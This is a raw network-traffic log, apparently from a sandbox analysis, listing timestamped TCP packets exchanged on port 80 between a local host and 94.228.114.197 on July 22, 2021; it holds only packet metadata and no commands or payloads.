Jul 22, 2021 11:28:05.123637915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123677969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123683929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123717070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123754025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123754978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123790979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123826027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123827934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123862982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123897076 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123898983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123944998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.123955965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.123986959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124022961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124052048 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124059916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124097109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124133110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124149084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124171019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124207973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124219894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124253035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124294043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124294996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124330044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124367952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124367952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124403954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124439955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124449968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124478102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124511957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124514103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124560118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124583006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124600887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.124650955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.124746084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.199637890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.199692011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.199856997 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.205225945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205262899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205287933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205306053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205332041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205355883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205379009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205404043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205426931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205468893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.205513000 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.205559969 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.205688953 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.206510067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.206547022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.206578970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.206609964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.206640959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.206672907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.206710100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.206784010 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.220596075 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.278956890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279027939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279086113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279182911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279228926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279267073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279273033 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279314041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279357910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279395103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279427052 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279433966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279438019 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279464006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279484034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279488087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279545069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279604912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279639006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279653072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279701948 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279743910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279767990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279825926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279829025 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279886007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.279939890 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.279941082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280002117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280057907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.280061007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280103922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280152082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280154943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.280205965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280251026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280287981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.280308008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280363083 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.280364037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280421019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280477047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280509949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.280530930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280577898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280625105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280672073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280719995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280766010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280812979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280858994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280905008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280952930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.280998945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281043053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281096935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281126022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281155109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281184912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281214952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281260014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281297922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281343937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281375885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281404018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281433105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281466961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281508923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281552076 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281594038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281641960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281687021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281735897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281784058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281829119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281872034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281918049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281955004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.281985998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282016039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282043934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282073021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282103062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282131910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282160997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282190084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282221079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282249928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282278061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282308102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282336950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282366037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282394886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282423973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282453060 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282481909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282510996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.282541037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284281015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284315109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284343004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284372091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284401894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284430981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284460068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284490108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284519911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.284550905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.285597086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.285625935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.285655975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.285696030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.285914898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.285948038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.293350935 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.293397903 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.294800043 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372024059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372108936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372169018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372198105 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372220993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372272968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372287989 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372330904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372385979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372426987 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372440100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372489929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372494936 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372544050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372596979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372608900 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372644901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372694016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372709036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372756958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372806072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372821093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372854948 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372905016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.372917891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.372958899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373011112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373017073 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373059034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373109102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373111963 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373163939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373217106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373228073 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373267889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373317003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373322010 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373372078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373424053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373426914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373471975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373521090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373523951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373569965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373619080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373620987 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373673916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373729944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373738050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373827934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373878002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373886108 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.373931885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373980999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.373987913 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374036074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374088049 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374093056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374144077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374192953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374197960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374241114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374289036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374310970 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374339104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374387980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374449015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374454975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374512911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374568939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374612093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374624014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374654055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374716043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374768019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374810934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374825001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374885082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.374891996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.374952078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375015974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375016928 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375075102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375143051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375174999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375231981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375282049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375328064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375336885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375401020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375462055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375509024 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375514030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375560999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375576019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375633955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375688076 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375745058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375802040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375850916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375864029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375865936 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375916004 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.375925064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.375986099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376041889 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376049042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376106977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376127005 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376158953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376211882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376235962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376266956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376318932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376326084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376370907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376425028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376450062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376477957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376537085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376595020 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376606941 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376625061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376677036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376725912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376728058 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376780033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376781940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376831055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376879930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376888037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.376935959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376991034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.376991034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377038956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377089024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377089977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377139091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377186060 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377191067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377233982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377283096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377289057 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377337933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377391100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377393007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377443075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377496958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377507925 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377547026 CEST	80	49720	94.228.114.197	192.168.2.3
